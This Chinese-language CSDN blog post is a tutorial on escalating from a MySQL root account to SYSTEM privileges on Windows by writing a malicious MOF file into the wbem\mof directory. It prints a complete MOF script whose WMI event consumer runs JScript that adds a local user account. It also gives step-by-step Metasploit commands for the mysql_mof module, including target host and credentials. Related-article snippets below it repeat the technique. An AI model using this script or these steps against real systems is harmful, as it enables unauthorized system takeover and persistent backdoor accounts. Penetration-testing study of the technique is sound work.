数据库提权--MOF(MYSQL)

于 2023-10-07 16:38:19 发布
阅读量638 收藏 2
点赞数 2
文章标签: mysql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45936617/article/details/133643097
版权

前言

  MOF提权的利用原理是利用c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每隔一段时间(默认5s)都会用系统权限执行一次的特性,来写入cmd命令使其被带入以系统权限执行

MOF提权的使用条件是:

1、secure_file_priv参数不为null

2、有修改nullevt.mof 文件的权限

3、数据库用户具有root权限

MOF提权的步骤是

有恶意语句的mof文件写入到mof目录下-->系统每隔一段时间自动执行 

实操 

1、手工版

 MOF文件的基本内容如下:

#pragma namespace(“\\\\.\\root\\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user xxx xxx /add\”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

  红色加粗部分的内容就是可以执行系统命令的地方,我们可以通过不断修改红色部分,上传到mof目录下,达到系统命令执行的目的。 

2、MSF工具利用

利用步骤;

1、查找mof利用模块        search mof

2、利用模块        use exploit/windows/mysql/mysql_mof

3、查看参数        show options

4、设置参数        set rhosts 192.168.137.xxx

                            set username root

                            set password root

5、利用漏洞        run

 (1)查找mof利用模块 

通过查找关键词MOF寻找可以利用的漏洞模块。

(2)利用模块

use加之前查找结果的序列号或者模块全称,进入漏洞利用阶段。

(3)查看参数   

通过show options语句查看漏洞模块需要我们完善的参数值。

(4)设置参数

通过set命令,将我们需要完善的参数值补充完整。

(5)利用漏洞

通过run或者exploit命令进行漏洞利用。

春天里面的龙
关注
操作系统权限提升(二十七)之数据库提权-MySQL MOF提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-22 611
mof是windows系统的一个“托管对象格式”文件(位置:C:/windows/system32/wbem/mof/),其作用是每隔五秒就会去监控进程创建和死亡,mof目录下有两个文件夹(good与bad)。Windows server 2003及以下系统每5秒会执行一次mof目录下的文件,执行成功会移动到good文件夹,执行失败则会移动到bad文件夹。注:MOF提权只能用于Windows系统提权,Linux提权无法使用。
提权mysql提权--udf、mof、启动项
yang1234567898的博客
01-05 1208
1、udf提权 当获取到mysql的root权限,需要进行权限提升,可以尝试使用udf提权 首先需要查看mysql是否有导入导出功能,如果secure_file_priv为null,则无法使用udf提权,如果value值为空,则可以继续尝试 show variables like 'secure_file_priv'; secure_file_priv的value为null ,不允许导入导出 secure_file_priv的value为/dir/,只允许dir目录下导入导.
mysql mof提权
m0_65096687的博客
05-23 285
mof 提权的原理就是利用mof目录下的mof文件会一段时间后自动执行,且权限为system,我们就利用此处的。让他执行一些我们想要的命令。2、数据库mysql
Mysql-mof提权
告白的博客
08-14 455
0x00 mof提权原理 类似于之前的udf提权,参考https://blog.csdn.net/qq_53577336/article/details/119700116 另外一种mysql提权方式叫做mof提权 在windows系统下 (在c:/windows/system32/wbem/ mof /nullevt. mof)存在一个mof文件,他的特点是,每个极短一段时间,便会以system权限自动运行文件内脚本,mof提权就是将我们写好的mof文件导入到该目录该文件里门,让他自行执行我们的语句,达到
MySQL提权mof提权
2301_77300311的博客
04-11 605
关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。MOF文件每五秒就会执行,而且是系统权限,我们通过mysql使用load_file 将文件写入/wbme/mof,然后系统每隔五秒就会执行一次我们上传的MOF。我们提权成功后,就算被删号,mof也会在五秒内将原账号重建,那么这给我们退出测试造成了很大的困扰,所以谨慎使用。
mysqlmof提权详解
weixin_30376323的博客
01-23 213
原理解读: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法1:运行MOF文件指定为命令行参数将Mofcomp.exe文件。方法2:使用IMofCompiler接口和$CompileFile方法。方法3:拖放到%SystemRoot%\System32\Wbem\MOF文件夹的...
提权-MY&MS&ORA数据库提权
qi_SJQ_的博客
02-01 1629
数据库提权: 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权来获得系统权限,不是提升数据库用户的权限,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库提权的可能。 #数据库应用提权在权限提升中的意义 #WEB 或本地环境如何探针数据库应用 #数据库提权权限用户密码收集等方法 #目前数据库提权对应的技术及方法等 提权流程:服务探针->信息收集->提权利用->获取权限 探针查看是否...
MySQL数据库之UDF提权MOF提权与反链端口提权
weixin_46044975的博客
12-14 872
数据库提权
weixin_71169068的博客
04-16 963
利用此方法第一步先判断版本和安装路径:1.mysql5.1 则 导出dll文件到安装目录 /lib/plugin(这个目录默认是没有的,需要我们去创建)查看版本:mysql=>5.1跳转到安装目录发现lib目录下没有plugin,这里需要我们新建目录点击mysql提权,设置好路径,安装DLL执行命令,从而提权
mysql mof提权_MySQL_MOF提权
weixin_32148341的博客
01-27 287
一、原理Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件:将MOF文件执行为命令行参数及Mofcomp.exe文件使用IMofCompiler接口和$CompileFile方法拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹下的MOF文件中托管对象格式(MOF)文件在 C:\Windows\System32\wbem\MOF...
Mysql提权方法总结系列-MOF提权
kracer的博客
02-27 3279
0x01 简介 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 0x02 条件 mysql有读写 C:/Windows/system32/...
mysqlmof提权
Clannad的博客
11-17 519
文章目录靶机 Server 2003use exploit/windows/mysql/mysql_mof查看需要配置的参数配置参数输入 run 或者 exploit 来执行成功拿到meterpreter回显之后,输入shell,拿下shell开启和关闭3389端口 靶机 Server 2003 use exploit/windows/mysql/mysql_mof 使用use 来调用此模块 记...
mysql mof_mof提权
weixin_33511821的博客
02-01 328
第一次接触提权,先看了个最简单的,哈哈哈哈,看了几个视频和文章,然后整理了一下,估计很多不对的地方,等真正了解了就回来改掉。原理mof是Windows系统的一个文件,位于c:windowssystem32wbemmofnullevt.mof,叫做托管对象格式,它的作用是每隔5秒,就会去监控进程的创建和死亡。mof提权的简单利用过程就是,拥有了MySQL的root权限后,使用root权限去执行上传操...
mysql mof提权_三、mysqlmof提权学习
weixin_32097465的博客
01-27 207
一、测试环境win2003 + phpnow二、使用条件mysql + root权限三、工具准备(1)工具1: 准备好mof提权脚本(具体mof脚本,已上传网盘)(2)工具2: 准备好菜刀(文件管理 + 数据库管理)四、提权原理上传mof提权脚本到mof默认加载目录(路径:c:/windows/system32/wbem/mof),系统会在每一分钟的某一个固定时间运行mof目录下的mof脚步文件,...
Windows提权之第三方组件mysql提权(mof)
mrx56的博客
03-31 4074
为什么要提权? 答:因为webshell的权限一般是继承中间件的权限,此时就需要提高到系统管理员权限才方便进一步渗透。一般java中间件运行权限最高。 Windows提权常用命令 内置组: Administrators(管理员组) Guests (来宾组,权限最低,默认禁止) Users(新建用户组) net user 查看所有用户信息 net user + 用户名 查看此用户信息 net user + 用户名 /del 删除此用户 net user + 用户名+密码 /add 添加用户 net loca
Mysql——mof提权
Zlirving_的博客
06-08 2192
mof提权 原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以system权限执行一次,所以,只要我们将想要的操作通过代码存储到这个mof文件中,就可以实现权限提升   利用条件 仅限windows 及适用于windows server2003及以下的版本 mysql用户具有root权限(对上面那个目录可写) 关闭了secure-file-priv   利用方式 拿下webshell之
数据库提权mysql_MOF
qq_45300786的博客
05-24 191
mysql——mof 脚本提权 https://blog.csdn.net/weixin_36462845/article/details/113592918 mysql——mof 脚本提权2 https://www.cnblogs.com/xishaonian/p/6384535.html mysql——mof 16进制提权 https://blog.csdn.net/cxrpty/article/details/104805108?utm_medium=distribute.pc_relevant.no
mysql mof提权原理_mof提权原理及其过程
weixin_39533742的博客
02-01 327
mof提权的原理:mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员...
mysql mof提权原理_mof提权原理及实现
weixin_36462845的博客
02-01 364
关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的nullevt.mof文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权的过程!首先将我们的 mof 提权脚本上传到可读写目录下,这里就不做演示了。接着我们选择 MySQL 提权项,输入我们已经获取的MySQL 账户信息...
mysql mof 提权
最新发布
05-31
MySQL MOF(Management Object Format)提权指的是攻击者利用MySQL服务器中的MOF漏洞来执行任意代码,从而实现提权攻击。MOF是一种用于描述Windows系统管理对象的格式,它可以被用来创建、修改和查询Windows系统对象。MySQL服务器中的MOF提权漏洞是由于MySQL服务器使用了WMI(Windows Management Instrumentation)组件,而WMI组件中存在漏洞导致的。 攻击者可以利用MOF提权漏洞来执行任意代码,从而完全控制MySQL服务器。具体来说,攻击者可以使用以下方法来实现MOF提权: 1. 利用MOF文件中的漏洞来执行任意代码; 2. 修改MOF文件中的内容,从而实现提权; 3. 利用MOF文件中的反射注入漏洞来执行任意代码; 4. 利用MOF文件中的DLL劫持漏洞来执行任意代码。 为了避免MOF提权漏洞的发生,建议用户在使用MySQL服务器时,遵循以下几点建议: 1. 及时更新MySQL服务器和操作系统的补丁; 2. 对MySQL服务器进行安全配置,限制外部访问; 3. 建立网络安全防火墙,限制对MySQL服务器的访问; 4. 对MOF文件进行限制,只允许特定用户或组对其进行修改和查询; 5. 限制MySQL管理员的权限,只允许特定的用户或组执行MySQL操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

春天里面的龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值